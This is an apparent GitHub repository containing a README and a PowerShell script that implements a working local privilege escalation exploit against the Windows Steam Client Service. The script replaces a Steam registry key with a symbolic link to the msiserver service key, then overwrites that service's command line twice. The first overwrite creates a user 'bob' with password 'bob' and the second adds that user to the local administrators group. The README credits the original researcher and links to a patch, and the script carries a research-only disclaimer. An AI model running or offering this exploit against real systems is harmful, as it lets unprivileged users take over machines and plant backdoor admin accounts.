├── README.md └── Fahrrad.ps1 /README.md: -------------------------------------------------------------------------------- 1 | # steam-privesc 2 | 3 | A privilege escalation exploit in the Steam Client 4 | 5 | credits go to Vasily Kravets, more info here: https://amonitoring.ru/article/steamclient-0day/ 6 | 7 | Steam fixed the issue in the current beta, make sure to patch: https://steamcommunity.com/groups/SteamClientBeta#announcements/detail/1602638506845644644 8 | -------------------------------------------------------------------------------- /Fahrrad.ps1: -------------------------------------------------------------------------------- 1 | #Fahrrad.ps1 2 | 3 | # This is a privilege escalation exploit for the Steam Client. Uses registry symlinks. Check it out at https://github.com/alexanderbittner/steam-privesc/ . 4 | # 5 | # This program is only intended for research purposes. 6 | # USE AT YOUR OWN RISK and please don't break anyone's system. 7 | # 8 | # PoC that was useful for developing this: https://gist.github.com/enigma0x3/03f065be011c5980b96855e2741bf302 9 | # credits go to Vasily Kravets @ https://amonitoring.ru/article/steamclient-0day/ 10 | 11 | import-module NTObjectManager 12 | Write-Host "Deleting reg key HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS" 13 | Remove-Item -Path "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS" 14 | 15 | Write-Host "Making reg symlink HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS -> HKLM:\SYSTEM\CurrentControlSet\Services\msiserver" 16 | [NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Valve\Steam\NSIS",$null, "\REGISTRY\Machine\SYSTEM\CurrentControlSet\Services\msiserver") 17 | Write-Host "[*] Registry Symbolic link created" 18 | 19 | #start steam client service 20 | Write-Host "[*] Starting client service..." 21 | Start-Service "Steam Client Service" 22 | Write-Host "[*] Started. Waiting a few seconds..." 23 | 24 | Start-Sleep 1 25 | Write-Host "" 26 | Write-Host " `$^ *." 27 | Write-Host " d`$`$`$`$`$`$`$P^ `$ J" 28 | Write-Host " ^$. 4r^ " 29 | Write-Host " d^b .db^" 30 | Write-Host " P $ e^ $" 31 | Write-Host " ..ec.. .^ *. zP $.zec.." 32 | Write-Host " .^ 3*b. *. .P^ .@^4F ^4" 33 | Write-Host " .^ d^ ^b. *c .`$^ d^ $ %" 34 | Write-Host " / P $. ^c d^ @ 3r 3" 35 | Write-Host " 4 .eE........$r===e`$`$`$`$eeP J *.. b" 36 | Write-Host " $ `$`$`$`$`$ `$ 4`$`$`$`$`$`$`$ F d`$`$`$. 4" 37 | Write-Host " $ `$`$`$`$`$ `$ 4`$`$`$`$`$`$`$ L *`$`$`$^ 4" 38 | Write-Host " 4 ^ ^^3P ===`$`$`$`$`$`$^ 3 P" 39 | Write-Host " * `$ ^^^ b J" 40 | Write-Host " ^. .P %. @" 41 | Write-Host " %. z*^ ^%. .r^" 42 | Write-Host " ^*==*^^ ^^*==*^^" 43 | Write-Host "" 44 | 45 | Start-Sleep 2 46 | Write-Host "The Fahrrad is ready." 47 | Start-Sleep 1 48 | Write-Host "[!] Setting payload: Adding new user bob" 49 | Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\msiserver" -Name "ImagePath" -Value "C:\Windows\System32\cmd.exe /c net user /add bob bob" 50 | 51 | Start-Sleep 1 52 | #start msiserver 53 | Write-Host "[*] Starting msiserver, this should execute the payload." 54 | Start-Service "msiserver" 55 | 56 | Start-Sleep 5 57 | Write-Host "[!] Setting payload: Making bob admin" 58 | Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\msiserver" -Name "ImagePath" -Value "C:\Windows\System32\cmd.exe /c net localgroup administrators bob /add" 59 | 60 | Start-Sleep 1 61 | #start msiserver 62 | Write-Host "[*] Starting msiserver, this should execute the payload." 63 | Start-Service "msiserver" 64 | 65 | Write-Host "Successfully added admin user with credentials bob:bob." 66 | net user bob --------------------------------------------------------------------------------